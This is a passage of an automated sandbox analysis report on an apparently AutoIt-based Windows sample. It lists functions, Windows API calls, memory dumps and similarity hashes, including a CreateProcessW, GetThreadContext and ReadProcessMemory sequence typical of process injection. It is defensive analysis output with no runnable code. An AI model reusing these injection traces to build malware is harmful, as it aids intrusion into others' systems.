                                                                                control_flow_graph 1433 5d3b1c-5d3b27 1434 5d3b99-5d3b9b 1433->1434 1435 5d3b29-5d3b2e 1433->1435 1436 5d3b8c-5d3b8f 1434->1436 1435->1434 1437 5d3b30-5d3b48 RegOpenKeyExW 1435->1437 1437->1434 1438 5d3b4a-5d3b69 RegQueryValueExW 1437->1438 1439 5d3b6b-5d3b76 1438->1439 1440 5d3b80-5d3b8b RegCloseKey 1438->1440 1441 5d3b78-5d3b7a 1439->1441 1442 5d3b90-5d3b97 1439->1442 1440->1436 1443 5d3b7e 1441->1443 1442->1443 1443->1440
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B40
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B61
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005D3B0F,SwapMouseButtons,00000004,?), ref: 005D3B83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: 7ffc909cf339578d7fba8c564678d06e5fc652883d6ad6d866434e598f4dd5c3
                                                                                • Instruction ID: d1556b42bb5398e3045e85049612467eac6fbfbd4be9dab7ce884f9f24f3ef89
                                                                                • Opcode Fuzzy Hash: 7ffc909cf339578d7fba8c564678d06e5fc652883d6ad6d866434e598f4dd5c3
                                                                                • Instruction Fuzzy Hash: 4D112AB5510208FFEB208FA9DC44AAEBBB8FF04754B10486BE845D7210E2719E409761
                                                                                Function 01A69238 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01A699F3
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A69A89
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A69AAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                                • Instruction ID: 06dba067258f5ac308e28550a9e18fa79c48998decdd6f04410ec0e1b3c962cc
                                                                                • Opcode Fuzzy Hash: 932a8f43b2c324a6e880b45aa11ae59a53f266e36399e6caa3e7e9a692624255
                                                                                • Instruction Fuzzy Hash: B6620C30A14258DBEB24CFA4C840BDEB776EF58304F1091A9D20DEB394E7769E85CB59
                                                                                Function 005D3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006133A2
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 005D3A04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                • String ID: Line:
                                                                                • API String ID: 2289894680-1585850449
                                                                                • Opcode ID: 0faa3f927dcabc8495e412fec43abdd6f703956b4fbeab3d0e647aa1c7c38cea
                                                                                • Instruction ID: 405c494728e2e71e948c36302ee6df4c00669a1c576d2f101c4e7f57cde8fc4a
                                                                                • Opcode Fuzzy Hash: 0faa3f927dcabc8495e412fec43abdd6f703956b4fbeab3d0e647aa1c7c38cea
                                                                                • Instruction Fuzzy Hash: 5C31E471508315AAC730EF18DC49BEB7BD9BB81710F00192BF59987291EB70AA49CBD3
                                                                                Function 005D2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00612C8C
                                                                                  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
                                                                                  • Part of subcall function 005D2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D2DC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                • String ID: X$`ei
                                                                                • API String ID: 779396738-2233648704
                                                                                • Opcode ID: 153c8ef50e648fe4d0f87817de6873216a005d84ff3e0afe826df91f39f91041
                                                                                • Instruction ID: b5cd6713bb099c023baa0cf24eebfaa974cc761fe90043afdf41e64bbd8b026e
                                                                                • Opcode Fuzzy Hash: 153c8ef50e648fe4d0f87817de6873216a005d84ff3e0afe826df91f39f91041
                                                                                • Instruction Fuzzy Hash: C321A470A002589BCF51EF98C8097EE7FFDAF89304F00805BE505A7341DBB455898FA1
                                                                                Function 005EFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 005F0668
                                                                                  • Part of subcall function 005F32A4: RaiseException.KERNEL32(?,?,?,005F068A,?,006A1444,?,?,?,?,?,?,005F068A,005D1129,00698738,005D1129), ref: 005F3304
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 005F0685
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: 593ad0fd865226da02cffb4a1ccfa9f4366711bcec2b7b801e602d5124f7fda7
                                                                                • Instruction ID: dc7787ec63988373f9cc98afaf1f7e836778af451b09b29b53fc9fac0934e644
                                                                                • Opcode Fuzzy Hash: 593ad0fd865226da02cffb4a1ccfa9f4366711bcec2b7b801e602d5124f7fda7
                                                                                • Instruction Fuzzy Hash: 5BF0C23490020E778F04BAA5EC4ACBE7F6D7E80350B644531BB14DA5D2EF75EA25CA81
                                                                                Function 00643017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0064302F
                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00643044
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: 3f91d474bf3a1fd5f9eea40c334500c31d4fc57d925b7aefa84b9028a59c07dd
                                                                                • Instruction ID: c24454339bb40827f6aab72caeb39d105decb2c8b72e37f8d6b6eaddeb545e62
                                                                                • Opcode Fuzzy Hash: 3f91d474bf3a1fd5f9eea40c334500c31d4fc57d925b7aefa84b9028a59c07dd
                                                                                • Instruction Fuzzy Hash: 6BD05B7150031467DB209794DC0DFD73A6CD704760F000151BA95D2091DAF49644CAD0
                                                                                Function 00657F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006582F5
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 006582FC
                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 006584DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                • String ID:
                                                                                • API String ID: 146820519-0
                                                                                • Opcode ID: d868d70d25c608018d71d5535fb91c96804309b06442d47da7bba0e465db1100
                                                                                • Instruction ID: fcc475f219f1c1bd0108aa610d06c1106de8bb9ca04bb5b1c8b7d7b7a76f854b
                                                                                • Opcode Fuzzy Hash: d868d70d25c608018d71d5535fb91c96804309b06442d47da7bba0e465db1100
                                                                                • Instruction Fuzzy Hash: 4E126C719083419FC724DF28C484B6ABBE6BF85315F04895DE8899B392DB31ED49CB92
                                                                                Function 005D10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D1BF4
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 005D1BFC
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D1C07
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D1C12
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 005D1C1A
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 005D1C22
                                                                                  • Part of subcall function 005D1B4A: RegisterWindowMessageW.USER32(00000004,?,005D12C4), ref: 005D1BA2
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005D136A
                                                                                • OleInitialize.OLE32 ref: 005D1388
                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 006124AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 1986988660-0
                                                                                • Opcode ID: f5f4c8672db747f3acc07f6325bdd213f36a75832edd48dc684f1542d69961e0
                                                                                • Instruction ID: 32fb241025cb9d10d449cc4859886128f1dfbc8b6130a48bc9b26954b913e1fd
                                                                                • Opcode Fuzzy Hash: f5f4c8672db747f3acc07f6325bdd213f36a75832edd48dc684f1542d69961e0
                                                                                • Instruction Fuzzy Hash: 29719AF8D116118EC388FF7DA8596653EE3FB8B394F04A22A905ACF361EB3464018F54
                                                                                Function 0063C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 005D3A04
                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0063C259
                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 0063C261
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0063C270
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer$Kill
                                                                                • String ID:
                                                                                • API String ID: 3500052701-0
                                                                                • Opcode ID: 7b9ad3fa0c0daef288c26dbbbfc750a6f1ad3862abdbbd73b09c7503215fec13
                                                                                • Instruction ID: 06f419d4c29fa966b5eaa85389b6f4506e15840e18fcdfa2c83f9f126909d79c
                                                                                • Opcode Fuzzy Hash: 7b9ad3fa0c0daef288c26dbbbfc750a6f1ad3862abdbbd73b09c7503215fec13
                                                                                • Instruction Fuzzy Hash: C431C570904344AFEB329F648855BE7BBEEAB07314F00149AE1DAA7241C7745A85CB91
                                                                                Function 006086AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,006085CC,?,00698CC8,0000000C), ref: 00608704
                                                                                • GetLastError.KERNEL32(?,006085CC,?,00698CC8,0000000C), ref: 0060870E
                                                                                • __dosmaperr.LIBCMT ref: 00608739
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2583163307-0
                                                                                • Opcode ID: a953a7eda6f74ab6b39f91f911ac720a563248c5a674dc52feeea4b74cbaf4c8
                                                                                • Instruction ID: 1aa9d27e98b3de9bd37292d4c2e6f0d9c8fd4a078a6398c2ed37a8f9ed0ef4b1
                                                                                • Opcode Fuzzy Hash: a953a7eda6f74ab6b39f91f911ac720a563248c5a674dc52feeea4b74cbaf4c8
                                                                                • Instruction Fuzzy Hash: 6B018E32A946301EDB6CE334A8457BF2B4B4B92774F3A051DF8459B2D3EFA2CC818654
                                                                                Function 005DDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TranslateMessage.USER32(?), ref: 005DDB7B
                                                                                • DispatchMessageW.USER32(?), ref: 005DDB89
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005DDB9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 005DDBB1
                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00621CC9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                • String ID:
                                                                                • API String ID: 3288985973-0
                                                                                • Opcode ID: 4a7b3e9c798a9cdaddbb6e8f9190bcf8b71a437a9676e1655f298f2e0a750836
                                                                                • Instruction ID: 8d7fead3ddccb0f1eff803614dfa48908d3c244f1288b820cc41456a08cb2806
                                                                                • Opcode Fuzzy Hash: 4a7b3e9c798a9cdaddbb6e8f9190bcf8b71a437a9676e1655f298f2e0a750836
                                                                                • Instruction Fuzzy Hash: 1DF05E306487509BE730DB64DC49FEA7BBAFB86310F10491AE68AC71C0DB74A448DF26
                                                                                Function 00642FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00642CD4,?,?,?,00000004,00000001), ref: 00642FF2
                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00642CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00643006
                                                                                • CloseHandle.KERNEL32(00000000,?,00642CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0064300D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 0f5ade69fe91d0654b248a332bd81b4660b4db89d710fba83aed852d51fa192a
                                                                                • Instruction ID: 6a87c4b6efcc85a34144a36e36e2556aa3198fee9aef2f88be02c96e77a32884
                                                                                • Opcode Fuzzy Hash: 0f5ade69fe91d0654b248a332bd81b4660b4db89d710fba83aed852d51fa192a
                                                                                • Instruction Fuzzy Hash: 7EE0863228062077D7302756BC0DFDB7E5DD7C6F75F104210F7A9751D086E1250142A8
                                                                                Function 005E1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005E17F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CALL
                                                                                • API String ID: 1385522511-4196123274
                                                                                • Opcode ID: bda702b4471b1e6655cb6e43be3c9b194ad75aed77538e7717bdf5b2db0bfa43
                                                                                • Instruction ID: bc21ca314b959817c2e56b9fef3ea0b9d88b3bc8b3f8cff5232961d917c2078a
                                                                                • Opcode Fuzzy Hash: bda702b4471b1e6655cb6e43be3c9b194ad75aed77538e7717bdf5b2db0bfa43
                                                                                • Instruction Fuzzy Hash: 0E228B706087829FC718DF15C494A2ABBF2BF89314F14895DF4968B3A2D731E841CF96
                                                                                Function 00646EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00646F6B
                                                                                  • Part of subcall function 005D4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad_wcslen
                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                • API String ID: 3312870042-2806939583
                                                                                • Opcode ID: dd1c9580452bbfcaebe1352332b11d04b0751476f44bed6cd31b80acd59fd3bc
                                                                                • Instruction ID: 31086ab3a98ab0ca7287af9625e4b9c3dcf15a2b69bd8855478387fb029e3b41
                                                                                • Opcode Fuzzy Hash: dd1c9580452bbfcaebe1352332b11d04b0751476f44bed6cd31b80acd59fd3bc
                                                                                • Instruction Fuzzy Hash: 30B152311082029FCB24EF24D4959AEBBE6BFD4710F04495EF496973A1EB70ED49CB92
                                                                                Function 005D3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 005D3908
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                • API String ID: 1144537725-0
                                                                                • Opcode ID: 71c86828522cf18c0f3e8f161a9c20f287ffe6d5c05fd24278548128772a51b2
                                                                                • Instruction ID: 985aee70c18362b5593e0962be94a52b0b9b595328caf653aa03ff38d7fe53bc
                                                                                • Opcode Fuzzy Hash: 71c86828522cf18c0f3e8f161a9c20f287ffe6d5c05fd24278548128772a51b2
                                                                                • Instruction Fuzzy Hash: 7E3193B05057019FD720EF28D884797BBE4FB4A718F00092FF59A97380E7B1AA44DB52
                                                                                Function 01A69235 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01A699F3
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A69A89
